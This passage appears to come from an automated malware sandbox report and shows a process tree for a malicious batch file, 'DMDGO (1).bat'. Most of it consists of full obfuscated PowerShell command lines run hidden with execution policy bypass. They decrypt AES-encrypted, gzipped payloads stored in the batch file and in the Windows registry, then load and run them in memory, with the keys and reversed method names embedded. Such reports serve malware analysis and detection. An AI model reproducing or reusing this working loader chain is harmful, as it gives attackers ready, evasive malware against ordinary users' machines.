'').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5496
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4496).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,8957871882788525829,13658173253590372197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4332 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\DMDGO (1).bat" "
  2⤵
  PID:1616
- - C:\Users\Admin\Downloads\DMDGO (1).bat.exe
    "DMDGO (1).bat.exe" -noprofile -windowstyle hidden -ep bypass -command $nxdhd = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\DMDGO (1).bat').Split([Environment]::NewLine);foreach ($rTzZT in $nxdhd) { if ($rTzZT.StartsWith(':: ')) { $pCAAj = $rTzZT.Substring(3); break; }; };$ROVJm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pCAAj);$rlWJv = New-Object System.Security.Cryptography.AesManaged;$rlWJv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$rlWJv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$rlWJv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d2UWzdiZOTW5ZCshp72vi/mVJM4Qox0RYc8nklPpZvs=');$rlWJv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1G2XQl2tD4JzwuN8NXDAbw==');$daxDH = $rlWJv.CreateDecryptor();$ROVJm = $daxDH.TransformFinalBlock($ROVJm, 0, $ROVJm.Length);$daxDH.Dispose();$rlWJv.Dispose();$mliXE = New-Object System.IO.MemoryStream(, $ROVJm);$zgBXo = New-Object System.IO.MemoryStream;$RTyqi = New-Object System.IO.Compression.GZipStream($mliXE, [IO.Compression.CompressionMode]::Decompress);$RTyqi.CopyTo($zgBXo);$RTyqi.Dispose();$mliXE.Dispose();$zgBXo.Dispose();$ROVJm = $zgBXo.ToArray();$xxbYH = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ROVJm);$rtDoN = $xxbYH.EntryPoint;$rtDoN.Invoke($null, (, [string[]] ('')))
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
      4⤵
      PID:5828
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = 